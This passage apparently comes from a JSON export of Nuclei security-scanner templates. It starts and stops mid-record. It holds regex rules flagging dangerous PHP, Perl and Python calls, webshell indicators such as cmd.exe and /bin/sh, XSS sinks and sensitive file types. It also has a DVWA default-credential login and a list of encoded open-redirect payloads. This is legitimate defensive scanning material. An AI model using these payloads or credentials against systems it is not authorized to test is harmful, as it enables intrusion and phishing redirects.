Users may be able to manipulate the pid values in such a way as to cause arbitrary signals to be sent to processes, possibly leading to exploits or DoS attacks.\n regex:\n - 'kill'\n\n - type: regex\n # Using user supplied strings as the arguments to ioctl may allow the user to manipulate the device in arbitrary ways.\n regex:\n - 'ioctl'\n\n - type: regex\n # Using user supplied strings anywhere inside of an eval is extremely dangerous. Unvalidated user input fed into an eval call may allow the user to execute arbitrary perl code. Avoid ever passing user supplied strings into eval.\n regex:\n - 'eval'\n\n - type: regex\n # Glob invokes a shell (usually /bin/csh) to obtain the list of filenames that match the glob pattern. Unvalidated user input used in a glob pattern could allow arbitrary shell code to be run, possibly executing programs as a result. Avoid using user input in glob patterns.\n regex:\n - 'glob'\n\n - type: regex\n # Remember that sensitive data get copied on fork. For example, a random number generator's internal state will get duplicated, and the child may start outputting identical number streams.\n regex:\n - 'fork'\n\n - type: regex\n # DNS results can easily be forged by an attacker (or arbitrarily set to large values, etc), and should not be trusted.\n regex:\n - 'gethostbyname'\n - 'gethostbyaddr'\n\n# digest: 4a0a00473045022100fbd7b50a240a33711df2a0f790ba06a15bcf1aa8a14085015a5b5e53c03df7cd02206d81256adc29f4c4ec6338882c5287986ffa812170c16361dc96163e2df71b29:922c64590222798bb761d5b6d8e72950\n", "hash": "786923fa146a30f4814631b319140ae8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df0" }, "name": "php-scanner.yaml", "content": "id: php-scanner\n\ninfo:\n name: PHP Scanner\n author: geeknik\n severity: info\n tags: php,file\nfile:\n - extensions:\n - html\n - htm\n - phtml\n - php\n - php3\n - php4\n - php5\n - phps\n - cgi\n - inc\n - tpl\n - test\n - module\n - plugin\n\n extractors:\n - type: 
regex\n # Investigate for possible SQL Injection\n # Likely vulnerable: $dbConn->GetRow(\"SELECT * FROM users WHERE id = $user_id\");\n # Likely not Vulnerable: $dbConn->GetRow(\"SELECT * FROM users WHERE id = ?\", array('$user_id'));\n regex:\n - '(?i)getone|getrow|getall|getcol|getassoc|execute|replace'\n\n - type: regex\n # Warn when var_dump is found\n regex:\n - 'var_dump'\n\n - type: regex\n # Warn when display_errors is enabled manually\n regex:\n - 'display_errors'\n\n - type: regex\n # Avoid the use of eval()\n regex:\n - 'eval'\n - 'eval\\((base64|eval|\\$_|\\$\\$|\\$[A-Za-z_0-9\\{]*(\\(|\\{|\\[))'\n\n - type: regex\n # Avoid the use of exit or die()\n regex:\n - 'exit'\n - 'die'\n\n - type: regex\n # Avoid the use of logical operators (ex. using and over &&)\n regex:\n - 'and'\n\n - type: regex\n # Avoid the use of the ereg* functions (now deprecated)\n regex:\n - 'ereg'\n\n - type: regex\n # Ensure that the second parameter of extract is set to not overwrite (not EXTR_OVERWRITE)\n regex:\n - 'extract'\n\n - type: regex\n # Checking output methods (echo, print, printf, print_r, vprintf, sprintf) that use variables in their options\n regex:\n - 'echo'\n - 'print'\n - 'printf'\n - 'print_r'\n - 'vprintf'\n - 'sprintf'\n\n - type: regex\n # Ensuring you're not using echo with file_get_contents\n regex:\n - 'file_get_contents'\n\n - type: regex\n # Testing for the system execution functions and shell exec (backticks)\n regex:\n - '\\\\`'\n\n - type: regex\n # Use of readfile, readlink and readgzfile\n regex:\n - 'readfile'\n - 'readlink'\n - 'readgzfile'\n\n - type: regex\n # Using parse_str or mb_parse_str (writes values to the local scope)\n regex:\n - 'parse_st'\n - 'mb_parse_str'\n\n - type: regex\n # Using session_regenerate_id either without a parameter or using false\n regex:\n - 'session_regenerate'\n\n - type: regex\n # Avoid use of $_REQUEST (know where your data is coming from)\n regex:\n - '\\\\$_REQUEST'\n\n - type: regex\n # Don't use 
mysql_real_escape_string\n regex:\n - 'mysql_real_escape_string'\n\n - type: regex\n # Avoiding use of import_request_variables\n regex:\n - 'import_request_variables'\n\n - type: regex\n # Avoid use of GLOBALS\n regex:\n - 'GLOBALS'\n\n - type: regex\n regex:\n - '_GET'\n\n - type: regex\n regex:\n - '_POST'\n\n - type: regex\n regex:\n - '_COOKIE'\n\n - type: regex\n regex:\n - '_SESSION'\n\n - type: regex\n # Ensure the use of type checking validating against booleans (===)\n regex:\n - '\\\\=\\\\=\\\\='\n\n - type: regex\n # Ensure that the /e modifier isn't used in regular expressions (execute)\n regex:\n - '\\\\/e'\n\n - type: regex\n # Using concatenation in header() calls\n regex:\n - 'header'\n\n - type: regex\n # Avoiding the use of $http_raw_post_data\n regex:\n - '\\\\$http_raw_post_data'\n\n - type: regex\n # interesting functions for POP/Unserialize\n regex:\n - \"__autoload\"\n - \"__destruct\"\n - \"__wakeup\"\n - \"__toString\"\n - \"__call\"\n - \"__callStatic\"\n - \"__get\"\n - \"__set\"\n - \"__isset\"\n - \"__unset\"\n\n - type: regex\n # phpinfo detected\n regex:\n - \"phpinfo\"\n\n - type: regex\n # registerPHPFunctions() allows code exec in XML\n regex:\n - \"registerPHPFunctions\"\n\n - type: regex\n regex:\n - \"session_start\"\n\n - type: regex\n # dBase DBMS\n regex:\n - \"dbase_open\"\n\n - type: regex\n # DB++ DBMS\n regex:\n - \"dbplus_open\"\n - \"dbplus_ropen\"\n\n - type: regex\n # Frontbase DBMS\n regex:\n - \"fbsql_connect\"\n\n - type: regex\n # Informix DBMS\n regex:\n - \"ifx_connect\"\n\n - type: regex\n # IBM DB2 DBMS\n regex:\n - \"db2_(p?)connect\"\n\n - type: regex\n # FTP server\n regex:\n - \"ftp_(ssl_)?connect\"\n\n - type: regex\n # Ingres DBMS\n regex:\n - \"ingres_(p?)connect\"\n\n - type: regex\n # LDAP server\n regex:\n - \"ldap_connect\"\n\n - type: regex\n # msession server\n regex:\n - \"msession_connect\"\n\n - type: regex\n # mSQL DBMS\n regex:\n - \"msql_(p?)connect\"\n\n - type: regex\n # MsSQL DBMS\n 
regex:\n - \"mssql_(p?)connect\"\n\n - type: regex\n # MySQL DBMS\n regex:\n - \"mysql_(p?)connect\"\n\n - type: regex\n # MySQLi Extension\n regex:\n - \"mysqli((_real)?_connect)?|_query\"\n\n - type: regex\n # Oracle OCI8 DBMS\n regex:\n - \"oci|(_new?)|_connect|(n?|p?)logon\"\n\n - type: regex\n # Oracle DBMS\n regex:\n - \"ora_(p?)connect\"\n\n - type: regex\n # Ovrimos SQL DBMS\n regex:\n - \"ovrimos_connect\"\n\n - type: regex\n # PostgreSQL DBMS\n regex:\n - \"pg_(p?)connect\"\n\n - type: regex\n # SQLite DBMS\n regex:\n - \"sqlite_(p?)open\"\n\n - type: regex\n # SQLite3 DBMS\n regex:\n - \"SQLite3\"\n\n - type: regex\n # Sybase DBMS\n regex:\n - \"sybase_(p?)connect\"\n\n - type: regex\n # TokyoTyrant DBMS\n regex:\n - \"TokyoTyrant\"\n\n - type: regex\n # XML document\n regex:\n - \"x(ptr|path)_new_context\"\n\n - type: regex\n # Investigate if GetTableFields is called safely\n regex:\n - \"GetTableFields\"\n\n - type: regex\n regex:\n - \"ini_get.*magic_quotes_gpc.*\"\n\n# digest: 4a0a00473045022100cdc04b80c9479b1a4fe8a4dd836ca51e473d21b6dfee8a10d4766eab8980dd66022002ed5ea70b600f04f8842ba1b24b70122656832d5769131b53c765c8f678a62a:922c64590222798bb761d5b6d8e72950\n", "hash": "24cd608e2a8d65f8ccda794bce38fccb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df1" }, "name": "python-scanner.yaml", "content": "id: python-scanner\n\ninfo:\n name: Python Scanner\n author: majidmc2\n severity: info\n description: Indicators for dangerous Python functions\n reference:\n - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html\n - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html\n tags: python,file,sast\nfile:\n - extensions:\n - py\n\n extractors:\n - type: regex\n name: code-injection\n regex:\n - 'exec'\n - 'eval'\n - '__import__'\n - 'execfile'\n\n - type: regex\n name: command-injection\n regex:\n - 'subprocess.call\\(.*shell=True.*\\)'\n - 'os.system'\n - 'os.popen\\d?'\n - 
'subprocess.run'\n - 'commands.getoutput'\n\n - type: regex\n name: untrusted-source\n regex:\n - 'pickle\\.loads'\n - 'c?Pickle\\.loads?'\n - 'marshal\\.loads'\n - 'pickle\\.Unpickler'\n\n - type: regex\n name: dangerous-yaml\n regex:\n - 'yaml\\.load'\n - 'yaml\\.safe_load'\n\n - type: regex\n name: sqli\n regex:\n - 'cursor\\.execute'\n - 'sqlite3\\.execute'\n - 'MySQLdb\\.execute'\n - 'psycopg2\\.execute'\n - 'cx_Oracle\\.execute'\n\n# digest: 4a0a00473045022100d5b183fba0418cf56693190a2b1b1112a53d5b2584f31c07241959a209caafac02200f7da04a1708afc23df42188fcae13c0efae39881a4179b4ecec77ce2e9843c7:922c64590222798bb761d5b6d8e72950\n", "hash": "96427816c89ee3626b929adbaa4ec07b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df2" }, "name": "url-extension-inspector.yaml", "content": "id: url-extension-inspector\n\ninfo:\n name: URL Extension Inspector\n author: ayadim\n severity: unknown\n description: |\n This template assists you in discovering intriguing extensions within a list of URLs.\n reference:\n - https://github.com/CYS4srl/CYS4-SensitiveDiscoverer/\n tags: file,url-analyse,urls,extension\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: Hot finding\n regex:\n - \"(?i)(htdocs|www|html|web|webapps|public|public_html|uploads|website|api|test|app|backup|bin|bak|old|release|sql)\\\\.(7z|bz2|gz|lz|rar|tar\\\\.gz|tar\\\\.bz2|xz|zip|z)\"\n\n - type: regex\n name: Backup file\n regex:\n - \"(?i)(\\\\.bak|\\\\.backup|\\\\.bkp|\\\\._bkp|\\\\.bk|\\\\.BAK)('|\\\")\"\n\n - type: regex\n name: PHP Source\n regex:\n - \"(?i)(\\\\.php)(\\\\.~|\\\\.bk|\\\\.bak|\\\\.bkp|\\\\.BAK|\\\\.swp|\\\\.swo|\\\\.swn|\\\\.tmp|\\\\.save|\\\\.old|\\\\.new|\\\\.orig|\\\\.dist|\\\\.txt|\\\\.disabled|\\\\.original|\\\\.backup|\\\\._back|\\\\._1\\\\.bak|~|!|\\\\.0|\\\\.1|\\\\.2|\\\\.3)('|\\\")\"\n\n - type: regex\n name: ASP Source\n regex:\n - 
\"(?i)(\\\\.asp)(\\\\.~|\\\\.bk|\\\\.bak|\\\\.bkp|\\\\.BAK|\\\\.swp|\\\\.swo|\\\\.swn|\\\\.tmp|\\\\.save|\\\\.old|\\\\.new|\\\\.orig|\\\\.dist|\\\\.txt|\\\\.disabled|\\\\.original|\\\\.backup|\\\\._back|\\\\._1\\\\.bak|~|!|\\\\.0|\\\\.1|\\\\.2|\\\\.3)('|\\\")\"\n\n - type: regex\n name: Database file\n regex:\n - \"(?i)\\\\.db|\\\\.sql('|\\\")\"\n\n - type: regex\n name: Bash script\n regex:\n - \"(?i)(\\\\.sh|\\\\.bashrc|\\\\.zshrc)('|\\\")\"\n\n - type: regex\n name: 1Password password manager database file\n regex:\n - \"(?i)\\\\.agilekeychain('|\\\")\"\n\n - type: regex\n name: ASP configuration file\n regex:\n - \"(?i)\\\\.asa('|\\\")\"\n\n - type: regex\n name: Apple Keychain database file\n regex:\n - \"(?i)\\\\.keychain('|\\\")\"\n\n - type: regex\n name: Azure service configuration schema file\n regex:\n - \"(?i)\\\\.cscfg('|\\\")\"\n\n - type: regex\n name: Compressed archive file\n regex:\n - \"(?i)(\\\\.zip|\\\\.gz|\\\\.tar|\\\\.rar|\\\\.tgz)('|\\\")\"\n\n - type: regex\n name: Configuration file\n regex:\n - \"(?i)(\\\\.ini|\\\\.config|\\\\.conf)('|\\\")\"\n\n - type: regex\n name: Day One journal file\n regex:\n - \"(?i)\\\\.dayone('|\\\")\"\n\n - type: regex\n name: Document file\n regex:\n - \"(?i)(\\\\.doc|\\\\.docx|\\\\.rtf)('|\\\")\"\n\n - type: regex\n name: GnuCash database file\n regex:\n - \"(?i)\\\\.gnucash('|\\\")\"\n\n - type: regex\n name: Include file\n regex:\n - \"(?i)\\\\.inc('|\\\")\"\n\n - type: regex\n name: XML file\n regex:\n - \"(?i)\\\\.xml('|\\\")\"\n\n - type: regex\n name: Old file\n regex:\n - \"(?i)\\\\.old('|\\\")\"\n\n - type: regex\n name: Log file\n regex:\n - \"(?i)\\\\.log('|\\\")\"\n\n - type: regex\n name: Java file\n regex:\n - \"(?i)\\\\.java('|\\\")\"\n\n - type: regex\n name: SQL dump file\n regex:\n - \"(?i)\\\\.sql('|\\\")\"\n\n - type: regex\n name: Excel file\n regex:\n - \"(?i)(\\\\.xls|\\\\.xlsx|\\\\.csv)('|\\\")\"\n\n - type: regex\n name: Certificate file\n regex:\n - 
\"(?i)(\\\\.cer|\\\\.crt|\\\\.p7b)('|\\\")\"\n\n - type: regex\n name: Java key store\n regex:\n - \"(?i)\\\\.jks('|\\\")\"\n\n - type: regex\n name: KDE Wallet Manager database file\n regex:\n - \"(?i)\\\\.kwallet('|\\\")\"\n\n - type: regex\n name: Little Snitch firewall configuration file\n regex:\n - \"(?i)\\\\.xpl('|\\\")\"\n\n - type: regex\n name: Microsoft BitLocker Trusted Platform Module password file\n regex:\n - \"(?i)\\\\.tpm('|\\\")\"\n\n - type: regex\n name: Microsoft BitLocker recovery key file\n regex:\n - \"(?i)\\\\.bek('|\\\")\"\n\n - type: regex\n name: Microsoft SQL database file\n regex:\n - \"(?i)\\\\.mdf('|\\\")\"\n\n - type: regex\n name: Microsoft SQL server compact database file\n regex:\n - \"(?i)\\\\.sdf('|\\\")\"\n\n - type: regex\n name: Network traffic capture file\n regex:\n - \"(?i)\\\\.pcap('|\\\")\"\n\n - type: regex\n name: OpenVPN client configuration file\n regex:\n - \"(?i)\\\\.ovpn('|\\\")\"\n\n - type: regex\n name: PDF file\n regex:\n - \"(?i)\\\\.pdf('|\\\")\"\n\n - type: regex\n name: PHP file\n regex:\n - \"(?i)\\\\.pcap('|\\\")\"\n\n - type: regex\n name: Password Safe database file\n regex:\n - \"(?i)\\\\.psafe3('|\\\")\"\n\n - type: regex\n name: Potential configuration file\n regex:\n - \"(?i)\\\\.yml('|\\\")\"\n\n - type: regex\n name: Potential cryptographic key bundle\n regex:\n - \"(?i)(\\\\.pkcs12|\\\\.p12|\\\\.pfx|\\\\.asc|\\\\.pem)('|\\\")\"\n\n - type: regex\n name: Potential private key\n regex:\n - \"(?i)otr.private_key('|\\\")\"\n\n - type: regex\n name: Presentation file\n regex:\n - \"(?i)(\\\\.ppt|\\\\.pptx)('|\\\")\"\n\n - type: regex\n name: Python file\n regex:\n - \"(?i)\\\\.py('|\\\")\"\n\n - type: regex\n name: Remote Desktop connection file\n regex:\n - \"(?i)\\\\.rdp('|\\\")\"\n\n - type: regex\n name: Ruby On Rails file\n regex:\n - \"(?i)\\\\.rb('|\\\")\"\n\n - type: regex\n name: SQLite database file\n regex:\n - \"(?i)\\\\.sqlite|\\\\.sqlitedb('|\\\")\"\n\n - type: regex\n name: SQLite3 
database file\n regex:\n - \"(?i)\\\\.sqlite3('|\\\")\"\n\n - type: regex\n name: Sequel Pro MySQL database manager bookmark file\n regex:\n - \"(?i)\\\\.plist('|\\\")\"\n\n - type: regex\n name: Shell configuration file\n regex:\n - \"(?i)(\\\\.exports|\\\\.functions|\\\\.extra)('|\\\")\"\n\n - type: regex\n name: Temporary file\n regex:\n - \"(?i)\\\\.tmp\"\n\n - type: regex\n name: Terraform variable config file\n regex:\n - \"(?i)\\\\.tfvars('|\\\")\"\n\n - type: regex\n name: Text file\n regex:\n - \"(?i)\\\\.txt('|\\\")\"\n\n - type: regex\n name: Tunnelblick VPN configuration file\n regex:\n - \"(?i)\\\\.tblk('|\\\")\"\n\n - type: regex\n name: Windows BitLocker full volume encrypted data file\n regex:\n - \"(?i)\\\\.fve('|\\\")\"\n# digest: 490a0046304402202fdd8df60e47d5428b4d97d4ba47f93898efa3684b316c3d2479f46f063495a6022061157464c0ef21307e4f8e852f5be86e0673c15f0c4a67ee24c230436e177a25:922c64590222798bb761d5b6d8e72950", "hash": "2feb8ed454bc5ab164565e286299389e", "level": 1, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df3" }, "name": "asp-webshell.yaml", "content": "id: asp-webshell\n\ninfo:\n name: ASP/ASP.NET Webshell - Detect\n author: lu4nx\n severity: high\n reference:\n - https://github.com/tennc/webshell/tree/master/aspx\n - https://github.com/tennc/webshell/tree/master/asp\n - https://www.rapid7.com/blog/post/2016/12/14/webshells-101/\n metadata:\n verified: true\n tags: asp,aspx,file,webshell\nfile:\n - extensions:\n - asp\n - asa\n - aspx\n - ashx\n - asmx\n - asax\n\n extractors:\n - type: regex\n regex:\n - '(?i)(eval)'\n - '(?i)(eval|execute)\\('\n - '(?i)wscript.shell'\n - '(?i)ExecuteStatement'\n - '(?i)cmd.exe'\n - '(?i)mmshell'\n - '(?i)GetCmd'\n\n# digest: 490a0046304402205f4df9ce77c729238615089b1cf2310f5574e15ac685df735c05f24fa9b33d5d02206ba3985dfbe3ff1ac6021c4ead721ebe24c54ebc10d32f695a6564563dcdf15b:922c64590222798bb761d5b6d8e72950\n", "hash": "c731bc6e784d72a552113be780bc47e0", "level": 5, "time": 
"2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df4" }, "name": "jsp-webshell.yaml", "content": "id: jsp-webshell\n\ninfo:\n name: JSP Webshell - Detect\n author: lu4nx\n severity: high\n reference:\n - https://github.com/tennc/webshell/tree/master/jsp\n - https://github.com/tennc/webshell/tree/master/jspx\n - https://www.rapid7.com/blog/post/2016/12/14/webshells-101/\n metadata:\n verified: true\n tags: jsp,java,jspx,webshell,file\nfile:\n - extensions:\n - jsp\n - java\n - jspx\n\n extractors:\n - type: regex\n regex:\n - '(?i)(ClassLoader|exec|eval|ProcessBuilder|getInputStream|loadClass|defineClass|URLClassLoader)\\('\n - '(?i)cmd.exe'\n - '(?i)/bin/sh'\n - '(?i)/bin/bash'\n - '(?i)exeCmd'\n\n# digest: 4b0a00483046022100c52ce185c59b043aaf28f5cb0e6a0ef91c7d71a5094888fd6cf1beb8778fcf36022100879fa5886ba403b3f31b9b5c0941048809eb8157d4cf191fcf06ea8fc540f836:922c64590222798bb761d5b6d8e72950\n", "hash": "5b0597a4b41ff440965a563c64a8ec02", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df5" }, "name": "php-webshell.yaml", "content": "id: php-webshell\n\ninfo:\n name: PHP Webshell - Detect\n author: lu4nx\n severity: high\n reference:\n - https://github.com/tennc/webshell/tree/master/php\n - https://www.rapid7.com/blog/post/2016/12/14/webshells-101/\n metadata:\n verified: true\n tags: php,file,webshell\nfile:\n - extensions:\n - php\n\n extractors:\n - type: regex\n regex:\n - '(?i)\\b(passthru|eval|exec|system|phpinfo|assert|call_user_func|call_user_func_array)\\('\n - '(?i)cmd.exe'\n - '(?i)/bin/sh'\n - '(?i)/bin/bash'\n - '(?i)WScript.Shell'\n - '(?i)gzuncompress\\(base64_decode\\('\n - '\\]\\(\\$_(GET|POST|COOKIE|REQUEST)\\['\n - '(?i)new\\s*(ReflectionFunction|ReflectionClass)'\n - '(?i)0x647261646e617473'\n - '65786563' # exec\n - '(?i)\\$\\w+\\(\\$_(GET|POST|COOKIE|REQUEST)'\n - '(?i)b4tm4n'\n - '(?i)cmdshell'\n\n# digest: 
490a00463044022078097d3237ceb0cabb1e0b1c456f4c14b80ea66d392154a136bdb5d453a7dcca0220201d8304738ea91076d9deb51e67c381d87e8f0d953a51743fa29fbd4615963f:922c64590222798bb761d5b6d8e72950\n", "hash": "58ba31361dfc87bab3069428721db94b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df6" }, "name": "dom-invader-xss.yaml", "content": "id: dom-invader-xss\n\ninfo:\n name: DOM Invader - Cross-Site Scripting\n author: geeknik\n severity: high\n description: DOM Invader contains a cross-site scripting vulnerability in Sources & Sinks functionality.\n reference:\n - Inspired by https://portswigger.net/blog/introducing-dom-invader\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-79\n tags: xss,file\nfile:\n - extensions:\n - js\n - ts\n - html\n - htm\n - php\n - cs\n - rb\n - py\n\n extractors:\n - type: regex\n name: sink\n part: body\n regex:\n - 'jQuery(\\.globalEval|\\.\\$|\\.constructor|\\.parseHTML|\\.has|\\.init|\\.index|\\.add|\\.append|\\.appendTo|\\.after|\\.insertAfter|\\.before|\\.insertBefore|\\.html|\\.prepend|\\.prependTo|\\.replaceWith|\\.replaceAll|\\.wrap|\\.wrapALL|\\.wrapInner|\\.prop\\.innerHTML|\\.prop\\.outerHTML|\\.attr\\.onclick|\\.attr\\.onmouseover|\\.attr.onmousedown|\\.attr\\.onmouseup|\\.attr\\.onkeydown|\\.attr\\.onkeypress|\\.attr\\.onkeyup|\\.attr\\.href|\\.attr\\.src|\\.attr\\.data|\\.attr\\.action|\\.attr\\.formaction|\\.prop\\.href|\\.prop\\.src|\\.prop\\.data|\\.prop\\.action|\\.prop\\.formaction)'\n - 'eval|Function|execScript|msSetImmediate|fetch(\\.body)?|form\\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\\.executeSql|JSON\\.parse'\n - 'fetch(\\.body)?'\n - 'history(\\.pushState|\\.replaceState)'\n - '(session|local)Storage(\\.setItem(\\.name|\\.value))'\n - 'anchor(\\.href|\\.target)'\n - 'button(\\.formaction|\\.value)'\n - 'set(Timeout|Interval|Immediate)'\n - 
'script(\\.src|\\.textContent|\\.innerText|\\.innerHTML|\\.appendChild|\\.append)'\n - 'document(\\.write|\\.writeln|\\.implementation\\.createHTMLDocument|\\.domain|\\.cookie|\\.evaluate)'\n - 'element(\\.outerText|\\.innerText|\\.textContent|\\.style\\.cssText|\\.innerHTML|\\.outerHTML|\\.insertAdjacentHTML|\\.setAttribute(\\.onclick|\\.onmouseover|\\.onmousedown|\\.onmouseup|\\.onkeydown|\\.onkeypress|\\.onkeyup|\\.href|\\.src|\\.data|\\.action|\\.formaction))'\n - 'location(\\.href|\\.replace|\\.assign|\\.pathname|\\.protocol|\\.host|\\.hostname|\\.hash|\\.search)?'\n - 'iframe(\\.srcdoc|\\.src)'\n - 'xhr(\\.open|\\.send|\\.setRequestHeader(\\.name|\\.value)?)'\n\n - type: regex\n name: source\n part: body\n regex:\n - 'location(\\.href|\\.hash|\\.search|\\.pathname)?'\n - 'window\\.name'\n - 'document(\\.URL|\\.referrer|\\.documentURI|\\.baseURI|\\.cookie)'\n# digest: 490a0046304402207cb01583d1a2752ecf4e9fc678dfecec46dfa254251612555d2126e63fc7c7e002202b4d56e018e4837351900cabe41fbb26d0f23c13bfbf5387f8e2161fff66ba60:922c64590222798bb761d5b6d8e72950", "hash": "133c8046c6b59eea692e46def49d08e0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df7" }, "name": "dvwa-headless-automatic-login.yaml", "content": "id: dvwa-headless-automatic-login\n\ninfo:\n name: DVWA Headless Automatic Login\n author: pdteam\n severity: high\n tags: headless,dvwa\n\nheadless:\n - steps:\n - args:\n url: \"{{BaseURL}}/login.php\"\n action: navigate\n\n - action: waitload\n\n - args:\n by: x\n xpath: /html/body/div/div[2]/form/fieldset/input\n action: click\n\n - action: waitload\n\n - args:\n by: x\n value: admin\n xpath: /html/body/div/div[2]/form/fieldset/input\n action: text\n\n - args:\n by: x\n xpath: /html/body/div/div[2]/form/fieldset/input[2]\n action: click\n\n - action: waitload\n\n - args:\n by: x\n value: password\n xpath: /html/body/div/div[2]/form/fieldset/input[2]\n action: text\n\n - args:\n by: x\n xpath: 
/html/body/div/div[2]/form/fieldset/p/input\n action: click\n\n - action: waitload\n\n matchers-condition: or\n matchers:\n - part: resp\n type: word\n words:\n - \"You have logged in as\"\n\n - part: resp\n type: word\n words:\n - \"First time using DVWA\"\n# digest: 4a0a0047304502202df744e611b878bb983647874d41c8e4ad4871a8129bd7257a920809328f5172022100ec6be46e75582d1bb87e9b892e2624c3d21bfdc055194913c342dbe2c9f75856:922c64590222798bb761d5b6d8e72950", "hash": "f63f63bdd2b64727dd18b5170b69efd9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df8" }, "name": "extract-urls.yaml", "content": "id: extract-urls\n\ninfo:\n name: Extract URLs from HTML attributes\n author: dwisiswant0\n severity: info\n tags: headless,extractor\n\nheadless:\n - steps:\n - args:\n url: \"{{BaseURL}}\"\n action: navigate\n\n - action: waitload\n\n - action: script\n name: extract\n args:\n code: |\n () => {\n return '\\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\\r\\n') + '\\n'\n }\n\n extractors:\n - type: kval\n part: extract\n kval:\n - extract\n# digest: 4a0a0047304502201929be3307cd1badad321f4fce5ff44feda065bae4ab72a7817ea16fa8201afb022100be1f94a508d5d79dbff66c137c8c8959b1168743fc8bfa3f612ae4ef3210ec45:922c64590222798bb761d5b6d8e72950", "hash": "e6571f5502261b9e523b628547803acb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df9" }, "name": "headless-open-redirect.yaml", "content": "id: headless-open-redirect\n\ninfo:\n name: Open Redirect - Detect\n author: theamanrawat\n severity: medium\n description: |\n An open redirect was detected. 
An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cwe-id: CWE-601\n tags: redirect,generic,headless\n\nheadless:\n - steps:\n - args:\n url: '{{BaseURL}}/{{redirect}}'\n action: navigate\n\n - action: waitload\n payloads:\n redirect:\n - '%09/oast.live/'\n - '%5C%5Coast.live/%252e%252e%252f'\n - '%5Coast.live'\n - '%5coast.live/%2f%2e%2e'\n - '%5c{{RootURL}}oast.live/%2f%2e%2e'\n - '../oast.live'\n - '.oast.live'\n - '/%5coast.live'\n - '////\\;@oast.live'\n - '////oast.live'\n - '///oast.live'\n - '///oast.live/%2f%2e%2e'\n - '///oast.live@//'\n - '///{{RootURL}}oast.live/%2f%2e%2e'\n - '//;@oast.live'\n - '//\\/oast.live/'\n - '//\\@oast.live'\n - '//\\oast.live'\n - '//\\toast.live/'\n - '//oast.live/%2F..'\n - '//oast.live//'\n - '//%69%6e%74%65%72%61%63%74%2e%73%68'\n - '//oast.live@//'\n - '//oast.live\\toast.live/'\n - '//https://oast.live@//'\n - '/<>//oast.live'\n - '/\\/\\/oast.live/'\n - '/\\/oast.live'\n - '/\\oast.live'\n - '/oast.live'\n - '/oast.live/%2F..'\n - '/oast.live/'\n - '/oast.live/..;/css'\n - '/https:oast.live'\n - '/{{RootURL}}oast.live/'\n - '/〱oast.live'\n - '/〵oast.live'\n - '/ゝoast.live'\n - '/ーoast.live'\n - '/ーoast.live'\n - '<>//oast.live'\n - '@oast.live'\n - '@https://oast.live'\n - '\\/\\/oast.live/'\n - 'evil%E3%80%82com'\n - 'oast.live'\n - 'oast.live/'\n - 'oast.live//'\n - 'oast.live;@'\n - 'https%3a%2f%2foast.live%2f'\n - 'https:%0a%0doast.live'\n - 'https://%0a%0doast.live'\n - 'https://%09/oast.live'\n - 'https://%2f%2f.oast.live/'\n - 'https://%3F.oast.live/'\n - 'https://%5c%5c.oast.live/'\n - 'https://%5coast.live@'\n - 'https://%23.oast.live/'\n - 'https://.oast.live'\n - 'https://////oast.live'\n - 'https:///oast.live'\n - 'https:///oast.live/%2e%2e'\n - 'https:///oast.live/%2f%2e%2e'\n - 
'https:///oast.live@oast.live/%2e%2e'\n - 'https:///oast.live@oast.live/%2f%2e%2e'\n - 'https://:80#@oast.live/'\n - 'https://:80?@oast.live/'\n - 'https://:@\\@oast.live'\n - 'https://:@oast.live\\@oast.live'\n - 'https://;@oast.live'\n - 'https://\\toast.live/'\n - 'https://oast.live/oast.live'\n - 'https://oast.live/https://oast.live/'\n - 'https://www.\\.oast.live'\n - 'https:/\\/\\oast.live'\n - 'https:/\\oast.live'\n - 'https:/oast.live'\n - 'https:oast.live'\n - '{{RootURL}}oast.live'\n - '〱oast.live'\n - '〵oast.live'\n - 'ゝoast.live'\n - 'ーoast.live'\n - 'ーoast.live'\n - 'redirect/oast.live'\n - 'cgi-bin/redirect.cgi?oast.live'\n - 'out?oast.live'\n - 'login?to=http://oast.live'\n - '#/oast.live'\n - '%0a/oast.live/'\n - '%0d/oast.live/'\n - '%00/oast.live/'\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"Interactsh Server\"\n# digest: 490a0046304402206753621bcdaff325fba22dd398200a7dd47f6959b40403a98fa2f3afeb17be380220103cac0ac968c27495b35cc3a61ae6fb152dfa0f35953c3c23b3e36110d194a7:922c64590222798bb761d5b6d8e72950", "hash": "3bac0b972aa09dc232cf8cd5e8369ac6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfa" }, "name": "postmessage-outgoing-tracker.yaml", "content": "id: postmessage-outgoing-tracker\n\ninfo:\n name: Postmessage Outgoing Tracker\n author: LogicalHunter\n severity: info\n reference:\n - https://appcheck-ng.com/html5-cross-document-messaging-vulnerabilities/\n tags: headless,postmessage\n\nheadless:\n - steps:\n - action: setheader\n args:\n part: response\n key: Content-Security-Policy\n value: \"default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;\"\n\n - action: script\n args:\n hook: true\n code: |\n () => {\n window.alerts = [];\n\n logger = found => window.alerts.push(found);\n\n 